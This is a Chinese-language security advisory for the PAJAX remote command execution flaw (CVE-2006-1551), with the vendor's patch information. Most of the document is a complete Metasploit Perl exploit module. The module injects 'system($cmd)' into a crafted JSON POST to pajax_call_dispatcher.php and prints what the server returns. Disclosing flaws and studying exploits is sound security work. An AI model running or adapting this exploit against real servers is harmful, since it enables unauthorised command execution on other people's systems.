安全研究
安全漏洞
PAJAX pajax_call_dispatcher.php远程执行任意命令漏洞
发布日期:2006-04-20
更新日期:2006-04-20
受影响系统:
PAJAX PAJAX 0.5.1不受影响系统:
PAJAX PAJAX 0.5.2描述:
BUGTRAQ ID: 17519
CVE ID: CVE-2006-1551
PAJAX是一个使用JavaScript创建远程PHP对象的框架系统。
PAJAX的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
PAJAX的pajax_call_dispatcher.php脚本对用户提交的POST参数没有做充分的检查过滤,可能由此执行嵌入其中的PHP代码。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::pajax_remote_exec;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'PAJAX Remote Command Execution',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'Matteo Cantoni <goony@nothink.org>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'DIR' => [1, 'DATA', 'PAJAX path', '/pajax/pajax/pajax_call_dispatcher.php'],
'MODULE' => [1, 'DATA', 'PAJAX module', 'Calculator'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(
qq{
RedTeam has identified two security flaws in PAJAX (<= 0.5.1).
It is possible to execute arbitrary PHP code from unchecked user input.
Additionally, it is possible to include arbitrary files on the server
ending in ".class.php".
}),
'Refs' =>
[
['OSVDB', '24618'],
['BID', '17519'],
['CVE', '2006-1551'],
['URL', 'http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php'],
['MIL', '1672'],
],
'Payload' =>
{
'Space' => 400,
'Keys' => ['cmd'],
},
'Keys' => ['pajax'],
'DisclosureDate' => '2006-03-30',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $dir = $self->GetVar('DIR');
my $module = $self->GetVar('MODULE');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $cmd = $encodedPayload->RawPayload;
$cmd = Pex::Text::URLEncode($cmd); chomp $cmd;
my $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"$module\", \"method\": \"add(1,1);system($cmd);\$obj->add\", \"params\": [\"1\", \"5\"]}";
my $request =
"POST $dir HTTP/1.1\r\n".
"Accept: */*\r\n".
"Host: $target_host:$target_port\r\n".
"Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Establishing a connection to the target...");
$s->Send($request);
my $results = $s->Recv(-1, 20);
my @results = split(/\n/, $results);
if (grep(/^HTTP\/1.1 200 OK/, @results)){
for(0..12){shift @results;}
for(0..2){pop @results;}
$self->PrintLine('');
foreach(@results){
$self->PrintLine($_);
}
} else{
$self->PrintLine("[*] This server does not appear to be vulnerable.");
}
$s->Close();
return;
}
sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
return $name;
}
1;
建议:
厂商补丁:
PAJAX
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://download.auberger.com/pajax-0.5.2.zip
浏览次数:3256
严重程度:0(网友投票)
绿盟科技给您安全的保障